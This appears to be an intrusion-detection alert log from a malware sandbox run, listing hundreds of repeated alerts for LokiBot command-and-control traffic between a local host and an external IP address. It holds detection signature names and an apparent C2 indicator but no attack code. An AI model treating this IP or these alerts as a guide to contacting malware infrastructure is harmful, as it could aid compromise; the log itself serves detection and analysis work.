2025-01-07T11:02:43.857197+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49952	TCP
2025-01-07T11:02:44.522405+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49958	TCP
2025-01-07T11:02:45.355010+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49964	TCP
2025-01-07T11:02:46.030084+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49969	TCP
2025-01-07T11:02:46.699686+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49971	TCP
2025-01-07T11:02:47.381254+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49976	TCP
2025-01-07T11:02:48.298557+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49982	TCP
2025-01-07T11:02:49.006487+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49987	TCP
2025-01-07T11:02:49.647518+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	49994	TCP
2025-01-07T11:02:50.336299+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50000	TCP
2025-01-07T11:02:51.071482+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50006	TCP
2025-01-07T11:02:51.758585+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50009	TCP
2025-01-07T11:02:52.460410+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50015	TCP
2025-01-07T11:02:53.129904+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50020	TCP
2025-01-07T11:02:53.782384+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50026	TCP
2025-01-07T11:02:54.695350+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50032	TCP
2025-01-07T11:02:55.675259+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50038	TCP
2025-01-07T11:02:56.386259+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50044	TCP
2025-01-07T11:02:57.059724+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50050	TCP
2025-01-07T11:02:57.747262+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50055	TCP
2025-01-07T11:02:58.413629+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50061	TCP
2025-01-07T11:02:59.073850+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50066	TCP
2025-01-07T11:02:59.744118+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50067	TCP
2025-01-07T11:03:00.408286+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50068	TCP
2025-01-07T11:03:01.060718+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50069	TCP
2025-01-07T11:03:01.746358+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50070	TCP
2025-01-07T11:03:02.419565+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50071	TCP
2025-01-07T11:03:03.192775+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50072	TCP
2025-01-07T11:03:03.866629+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50073	TCP
2025-01-07T11:03:04.533080+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50074	TCP
2025-01-07T11:03:05.175810+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50075	TCP
2025-01-07T11:03:05.822165+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50076	TCP
2025-01-07T11:03:06.488803+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50077	TCP
2025-01-07T11:03:07.165978+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50078	TCP
2025-01-07T11:03:07.991205+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50079	TCP
2025-01-07T11:03:08.660237+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50080	TCP
2025-01-07T11:03:09.310820+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50081	TCP
2025-01-07T11:03:09.979775+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50082	TCP
2025-01-07T11:03:10.638618+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50083	TCP
2025-01-07T11:03:11.312316+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50084	TCP
2025-01-07T11:03:11.962187+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50085	TCP
2025-01-07T11:03:12.618552+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50086	TCP
2025-01-07T11:03:13.259632+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50087	TCP
2025-01-07T11:03:13.969885+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50088	TCP
2025-01-07T11:03:14.627975+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50089	TCP
2025-01-07T11:03:15.287870+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50090	TCP
2025-01-07T11:03:16.010889+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50091	TCP
2025-01-07T11:03:16.665102+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50092	TCP
2025-01-07T11:03:17.422734+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50093	TCP
2025-01-07T11:03:18.076057+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50094	TCP
2025-01-07T11:03:18.735502+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50095	TCP
2025-01-07T11:03:19.380219+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50096	TCP
2025-01-07T11:03:20.048644+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50097	TCP
2025-01-07T11:03:20.707633+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50098	TCP
2025-01-07T11:03:21.363986+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50099	TCP
2025-01-07T11:03:22.002829+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50100	TCP
2025-01-07T11:03:23.056926+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50101	TCP
2025-01-07T11:03:24.002501+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50102	TCP
2025-01-07T11:03:24.677650+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50103	TCP
2025-01-07T11:03:26.572830+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50104	TCP
2025-01-07T11:03:27.233439+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50105	TCP
2025-01-07T11:03:27.885439+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50106	TCP
2025-01-07T11:03:28.538369+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50107	TCP
2025-01-07T11:03:29.211601+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50108	TCP
2025-01-07T11:03:29.879303+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50109	TCP
2025-01-07T11:03:30.549655+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50110	TCP
2025-01-07T11:03:31.244883+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50111	TCP
2025-01-07T11:03:31.931632+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50112	TCP
2025-01-07T11:03:32.590737+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50113	TCP
2025-01-07T11:03:33.260811+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50114	TCP
2025-01-07T11:03:34.641210+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50115	TCP
2025-01-07T11:03:35.289758+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50116	TCP
2025-01-07T11:03:35.973094+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50117	TCP
2025-01-07T11:03:36.637436+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50118	TCP
2025-01-07T11:03:37.301961+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50119	TCP
2025-01-07T11:03:37.940683+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50120	TCP
2025-01-07T11:03:38.582642+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50121	TCP
2025-01-07T11:03:39.253953+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50122	TCP
2025-01-07T11:03:39.918492+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50123	TCP
2025-01-07T11:03:40.577698+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50124	TCP
2025-01-07T11:03:41.232579+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50125	TCP
2025-01-07T11:03:41.945929+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50126	TCP
2025-01-07T11:03:42.586998+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50127	TCP
2025-01-07T11:03:43.230824+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50128	TCP
2025-01-07T11:03:43.889105+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50129	TCP
2025-01-07T11:03:44.570674+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50130	TCP
2025-01-07T11:03:45.219660+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50131	TCP
2025-01-07T11:03:45.873803+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50132	TCP
2025-01-07T11:03:46.515917+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50133	TCP
2025-01-07T11:03:47.258469+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50134	TCP
2025-01-07T11:03:47.940076+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50135	TCP
2025-01-07T11:03:48.604851+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50136	TCP
2025-01-07T11:03:49.306405+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50137	TCP
2025-01-07T11:03:49.953044+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50138	TCP
2025-01-07T11:03:50.596016+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50139	TCP
2025-01-07T11:03:51.252940+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50140	TCP
2025-01-07T11:03:51.922271+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50141	TCP
2025-01-07T11:03:52.591821+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50142	TCP
2025-01-07T11:03:53.254375+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50143	TCP
2025-01-07T11:03:53.917994+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50144	TCP
2025-01-07T11:03:54.588580+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50145	TCP
2025-01-07T11:03:55.236778+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50146	TCP
2025-01-07T11:03:55.875955+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50147	TCP
2025-01-07T11:03:56.533027+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50148	TCP
2025-01-07T11:03:57.201332+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50149	TCP
2025-01-07T11:03:57.865551+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50150	TCP
2025-01-07T11:03:58.565391+0100	2025483	1	A Network Trojan was detected	172.245.123.11	80	192.168.2.5	50151	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:58.458090+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:59.167458+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.826437+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:02:00.489975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:01.182301+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.907867+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:02.634049+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:03.321041+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:04.082310+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.772127+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:05.483094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:06.191450+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.944182+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:07.693898+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:08.371774+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:09.043689+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.690323+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:10.371491+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:11.080195+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.739564+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:12.466482+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:13.113940+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.753938+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:14.420666+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:15.079219+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.751764+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:16.407319+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:17.070038+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.794738+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:18.478664+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:19.157102+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.851955+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:20.564861+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:21.267286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.949590+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:22.615903+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:23.331353+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:24.058134+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.758689+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:25.495647+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:26.182014+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.935612+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:27.636276+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:28.470234+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:29.132407+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.819500+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:30.594718+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:31.270511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.967447+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:32.650824+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:33.618441+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:34.281865+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:35.003595+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.669509+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:36.331257+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.981306+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:37.629932+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:38.440568+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:39.104350+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.771926+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:40.445565+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:41.134057+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.803713+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:42.460094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:43.145887+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.852429+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:44.522317+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:45.350075+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:46.030026+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.699521+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:47.374652+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:48.292985+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:49.000377+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.647470+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:50.327734+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:51.066587+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.758580+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:52.460403+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:53.129836+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.777572+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:54.694689+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:55.670454+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:56.381416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:57.059679+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.747009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:58.413612+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:59.073831+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.743774+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:03:00.408178+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:01.053021+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.734889+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:02.402684+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:03.187911+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.861850+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:04.533061+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:05.175668+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.822128+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:06.488704+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:07.161033+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.986400+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:08.655207+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:09.305924+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.979695+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:10.638606+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:11.312133+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.962130+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:12.613769+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:13.254814+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.969827+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:14.623238+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:15.287763+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:16.006105+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.665049+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:17.417958+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:18.071243+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.730694+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:19.380183+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:20.048570+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.702835+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:21.357331+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.997605+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:23.056888+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:24.002235+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.672832+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:26.568049+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:27.233167+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.880660+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:28.538323+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:29.206821+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50108	172.245.123.11	80	TCP
